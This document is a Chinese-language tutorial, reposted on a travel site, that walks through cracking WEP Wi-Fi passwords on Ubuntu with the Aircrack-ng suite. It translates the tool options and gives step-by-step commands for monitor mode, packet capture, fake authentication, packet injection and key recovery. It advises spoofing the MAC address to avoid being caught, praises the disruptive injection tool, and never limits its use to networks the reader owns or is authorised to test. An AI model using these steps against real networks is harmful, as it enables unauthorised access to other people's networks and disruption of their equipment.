您好,欢迎来到爱够旅游网。
搜索
您的当前位置:首页Ubuntu下Aircrack-ng工具包的使用说明

Ubuntu下Aircrack-ng工具包的使用说明

来源:爱够旅游网
Ubuntu下Aircrack-ng工具包的使用

安装:$sudo apt-get install aircrack-ng

Aircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个: airmon-ng 处理网卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 发包,干扰

1) airmon-ng

启动无线网卡进入 Monitor 模式,

useage: airmon-ng [channel] :启动,停止,检测 :指定无线网卡

[channel]:监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了

2) airodump-ng

抓包工具,我最喜欢用的,详细用法如下:

usage: airodump-ng [,,...] Options:

–ivs :仅将抓取信息保存为 .ivs

–write :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

–beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的 Filter options:

–encrypt : 使用密码序列过滤 AP –netmask : 使用掩码过滤 AP –bssid : 使用 bssid 过滤 AP -a : 过滤无关的客户端

–help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

3)aireplay-ng

搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

usage: aireplay-ng Filter options:

-b bssid : AP的 MAC -d dmac:目标的 MAC -s smac :来源的 MAC -m len: 最小包长度 -n len: 最大包长度 -D: 禁用 AP 发现功能 Replay options: -x nbpps : 每秒包数量 -p fctrl : 框架设定 (hex) -a bssid : 设置AP的 mac -c dmac: 设置目标的 MAC -h smac: 设置来源的 mac

-g value : 改变环缓存大小 (默认8) Fakeauth attack options:

-e essid : 设置目标 AP 的 SSID

-o npckts : 每秒爆破的包数量 (0 自动, 默认 1) -q sec: 存活时间 秒

-y prga: 共享可信的 key流

–help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.

4)aircrack-ng

破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

usage: aircrack-ng [options] <.cap / .ivs file(s)> Common options:

-a : 暴破 (1/WEP, 2/WPA-PSK) -e : 选择 essid 为目标

-b : 选择 ap的 mac 为目标,就是破解识别的关键字 -q : 使用安静模式,无数出模式

-C : 将所有的 AP 合并为一个虚拟的 –help: 显示这个帮助

就WEP破解说明,步骤:

步骤:

1. 修改无线网卡状态:先 down 掉

2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能 3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡 4. 修改无线网卡状态: up

5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标 6. 监听抓包:生成 .cap 或 .ivs

7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包

8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解

具体步骤:

1、首先确定是否有wlan0的无线网卡端口,ifconfig即可知道。若存在终端输入 sudo airmon-ng start wlan0 启动无线 网卡 的监控模式。

2、在终端中输入 sudo airodump -ng mon0 ,启动监控模式后无线端口是mon0(如果启动多次会按数字累加), 看看有哪些采用wep 加密的AP在线,然后按 ctrl+c 退出,保留终端。

3、 另开一个终端,输入 sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c后面的6为AP工作频道,--bissid后面的AP's MAC 是要欲破解AP的MAC地址,-w后的wep的是抓下来的数据包DATA 保存的文件名(可以随便取名),然后回车开始抓包。

(后来补上去的一张图,所以时间不对:))

4、再另开一个终端,输入 sudo aireplay-ng -1 0 -e ESSID -a AP's MAC -h My

MAC mon0 与AP建立虚拟连接 (-h后面跟着的My MAC 是自己的无线网卡的MAC地址)

这里以之前探测到的ESSID为P2P的为例。

5、建立虚拟连接成功后,输入sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 进行注入,现在步骤3中数据包应该不断增长。

6、收集有5000个以上的DATA之后,另开一个终端,输入 sudo aircrack-ng wep*.cap 进行解密 (如果没算出来的话,继续等,Ubuntu aircrack-ng会在DATA每增加多5000个之后就自动再运行 ,直到算出密码为至)

7、破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的,除非重新启动电脑。

8、如果没有出现意外,你应该会很高兴的看到KEY FOUND!

因篇幅问题不能全部显示,请点此查看更多更全内容

Copyright © 2019- igbc.cn 版权所有 湘ICP备2023023988号-5

违法及侵权请联系:TEL:199 1889 7713 E-MAIL:2724546146@qq.com

本站由北京市万商天勤律师事务所王兴未律师提供法律服务